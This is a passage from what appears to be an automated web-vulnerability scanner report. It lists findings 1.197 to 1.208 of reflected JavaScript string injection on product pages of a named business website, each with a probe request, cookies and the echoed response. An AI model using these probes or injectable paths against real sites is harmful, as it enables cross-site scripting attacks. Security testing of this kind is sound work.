Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 612a0"%3b2e75e839ef7 was submitted in the REST URL parameter 3. This input was echoed as 612a0";2e75e839ef7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-email612a0"%3b2e75e839ef7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:50 GMT
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/mobile-email612a0";2e75e839ef7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.197. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82fe8"%3bea8aa6a43b4 was submitted in the REST URL parameter 1. This input was echoed as 82fe8";ea8aa6a43b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products82fe8"%3bea8aa6a43b4/mobility/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:47:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products82fe8";ea8aa6a43b4/mobility/mobile-internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.198. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a407d'%3b0bb4a7e87c2 was submitted in the REST URL parameter 1. This input was echoed as a407d';0bb4a7e87c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa407d'%3b0bb4a7e87c2/mobility/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsa407d';0bb4a7e87c2/mobility/mobile-internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.199. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f332a"%3b505833883a3 was submitted in the REST URL parameter 2. This input was echoed as f332a";505833883a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf332a"%3b505833883a3/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:26 GMT
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf332a";505833883a3/mobile-internet/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.200. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e76d'%3b6b102cf14f1 was submitted in the REST URL parameter 2. This input was echoed as 3e76d';6b102cf14f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility3e76d'%3b6b102cf14f1/mobile-internet/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility3e76d';6b102cf14f1/mobile-internet/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.201. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4002a"%3b1c83d06f92b was submitted in the REST URL parameter 3. This input was echoed as 4002a";1c83d06f92b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-internet4002a"%3b1c83d06f92b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/mobile-internet4002a";1c83d06f92b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.202. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-internet/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc33a'%3b3c0152b12c3 was submitted in the REST URL parameter 3. This input was echoed as bc33a';3c0152b12c3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-internetbc33a'%3b3c0152b12c3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43682
Date: Wed, 17 Nov 2010 00:49:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/mobile-internetbc33a';3c0152b12c3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.203. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20e13'%3b56ef80f6432 was submitted in the REST URL parameter 1. This input was echoed as 20e13';56ef80f6432 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products20e13'%3b56ef80f6432/mobility/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products20e13';56ef80f6432/mobility/program-management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.204. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eb1c"%3b3807fb0311a was submitted in the REST URL parameter 1. This input was echoed as 1eb1c";3807fb0311a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1eb1c"%3b3807fb0311a/mobility/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products1eb1c";3807fb0311a/mobility/program-management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.205. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f63f"%3b55c442f263f was submitted in the REST URL parameter 2. This input was echoed as 1f63f";55c442f263f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility1f63f"%3b55c442f263f/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:10 GMT
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility1f63f";55c442f263f/program-management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.206. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 703f8'%3bcc71bbbe59c was submitted in the REST URL parameter 2. This input was echoed as 703f8';cc71bbbe59c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility703f8'%3bcc71bbbe59c/program-management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility703f8';cc71bbbe59c/program-management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.207. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f3a8'%3bac7bb619e9a was submitted in the REST URL parameter 3. This input was echoed as 5f3a8';ac7bb619e9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/program-management5f3a8'%3bac7bb619e9a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/program-management5f3a8';ac7bb619e9a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.208. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/program-management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7840c"%3b247aa4cf98 was submitted in the REST URL parameter 3. This input was echoed as 7840c";247aa4cf98 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/program-management7840c"%3b247aa4cf98/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:30 GMT
Content-Type: text/html
Content-Length: 43688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

